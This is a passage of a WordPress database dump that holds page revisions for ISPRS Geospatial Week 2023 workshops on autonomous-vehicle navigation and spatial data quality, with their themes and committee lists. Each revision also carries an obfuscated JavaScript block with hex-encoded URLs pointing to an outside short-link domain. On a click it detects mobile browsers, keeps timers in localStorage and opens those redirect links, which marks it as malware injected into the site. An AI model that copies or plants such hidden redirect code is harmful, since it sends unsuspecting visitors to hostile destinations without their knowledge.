Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','ISSDQ  2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis','','inherit','closed','closed','','2798-revision-v1','','','2023-02-05 14:14:26','2023-02-05 14:14:26','',2798,'https://gsw2023.com/?p=3825',0,'revision','',0),
(3826,1,'2023-02-05 14:16:03','2023-02-05 14:16:03','<p>[vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles</strong></span></h5>\n<h5></h5>\n<h5><strong>Scope:</strong></h5>\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\n<p>[/vc_column_text][vc_column_text]</p>\n<h6 style=\"text-align: justify; color: black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\n<p>.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2857\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\n</li>\n<li>\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\n</li>\n<li>\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\n</li>\n<li>\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\n</li>\n<li>\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\n</li>\n<li>\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\n</li>\n<li>\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\n</li>\n<li>\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\n</li>\n<li>\n<h6><strong>Applications of AVs.</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Cairo Lúcio Nascimento Junior, ITA, Brazil</strong></h6>\n</li>\n<li>\n<h6><strong>Peter Travis Jardine, Royal Military College of Canada, ON, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Tamazin, Orolia, Montreal, QC, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Paul Hershey, Raytheon, USA (I still need to confirm with him)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Technologies Inc.</strong></h6>\n</li>\n<li>\n<h6><strong>Caroline Channel, ISAE-Supaero, France</strong></h6>\n</li>\n<li>\n<h6><strong>Ashraf Abosekeen, Military Technical College, Cairo, Egypt.</strong></h6>\n</li>\n<li>\n<h6><strong>Umar Iqbal, Mississippi State University, USA</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-revision-v1','','','2023-02-05 14:16:03','2023-02-05 14:16:03','',2856,'https://gsw2023.com/?p=3826',0,'revision','',0),
(3827,1,'2023-02-05 14:16:26','2023-02-05 14:16:26','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2802\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">ISSDQ 2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis</span></strong></h5>\r\n<h5></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Spatial data quality concerns with the reliability, confidence and trustworthiness of spatial data and their fitness for use. In the new era of spatial big data, IoT, smart city, ubiquitous spatial information systems and volunteered data produced using space-borne, areal and geo-sensors as well as human sensors in the phases of collection, fusion and leveraging artificial intelligence for spatial information extraction, and modeling, the issue of spatial data quality and uncertainty assessment requires more attention than ever before. Spatial data quality and uncertainty assessment/modeling are integrated components of spatial information systems main functionalities in measuring, mapping, managing, modeling and monitoring. The 12<sup>th</sup> International Symposium on Spatial Data Quality (ISSDQ 2023) will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single-track symposium of keynote and oral presentations as well as poster sessions and a panel discussion in the context of the ISPRS Geospatial Week.</strong></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_row_inner][vc_column_inner][vc_column_text]\r\n<h1><strong>CHAIRES</strong></h1>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"51\"][/vc_column_inner][/vc_row_inner][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Spatial data quality in space and time,</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Leveraging artificial intelligence in spatial data analysis and quality assessment,</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Collaborative spatial data quality</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Uncertainty modeling, assessment and propagation in spatial analyses</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Error assessment and propagation in digital terrain modeling</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Intelligent methodologies to integrate and assess spatial data and spatial analysis</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Smart spatial data infrastructures, land administration systems, cadastral surveying and mapping, BIM and their quality assessment</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Interoperability issues in spatial data analysis</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Challenges in assessing big spatial data in spatial information science</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6>Spatial and spatio-temporal statistics methods and th<strong>eir uncertainty assessment</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Challenges in assessment of UBGI/UBGIS, GSN, autonomous driving, smart city, multidimensional GIS, UAV, marine GIS, disaster management, and real time spatial data collections, collation and processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Harmonization of spatial information models and standards</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Matching the spatial data quality of combining multiple datasets</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Increasing spatial data quality through fusion</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Deep learning spatial data quality assessment</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Spatial data quality assessment of transferability</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Spatial data quality visualization</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Web GIS data quality</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensor-based data quality</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Intelligent GIS</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2803\" img_size=\"1200x800\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Bryan C. Pijanowski, University of Purdue, US.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Christophe Claramunt, Naval Academy Research Institute, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Giles Foody, Nottingham University, UK</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Qiming Zhou, Baptist University, Hong Kong</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mir Abolfazl Mostafavi, Laval University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Nico vande Weghe, Ghent University, Belgium</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Alfred Stein, Twente University, The Netherlands</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>John W.Z. Shi, The Hong Kong Polytechnic University, </strong></h6>\r\n<h6><strong>Hong Kong, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gerhard Navratil, TU Wien, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Jamal Jokar Arsanjani, Aalborg University, Denmark</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ana-Maria Raimond, IGN, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Jan Blachowski, Warsaw University, Poland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Yongze Song, Curtin University, Australia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mojgan Jadidi, York University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hossein Chavoshi, University of Life Science, Norway</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Robert G. Pontious, Clark University, US</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Alexis Comber, Leeds University, UK</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Bahareh Kalantar, Riken, Japan</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Nicholas Hamm, Nottingham University China Campus, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Firoozeh Karimi, North Carolina A &amp; T, US</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong><a href=\"mailto:Mingshu%20Wang,%20Glasgow%20University,%20UK%20%20.ac.uk\">Mingshu Wang, Glasgow University, UK </a></strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Umit Isikdag, Istanbul Technical University, Turkey</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria, South Africa</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mei-Po Kwan, Chinese University of Hong Kong, Hong Kong</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Cidalia Fonte, University of Coimbra, Portugal</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Bin Jiang, University of Galve, Sweden</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"8\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-medium wp-image-2805\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/m4-300x180.jpg\" alt=\"\" width=\"300\" height=\"180\" />\r\n<h5 style=\"text-align: justify; color: red;\"><strong><u>Special Issue dedicated to the workshop: </u></strong></h5>\r\n<h6 style=\"text-align: justify; color: black;\"><strong>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to the ISPRS IJGI and Geospatial information Science (GSIS) journals. The papers being accepted after the peer-review process of the journal will appear in a special issue of the journals dedicated to this symposium. </strong></h6>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 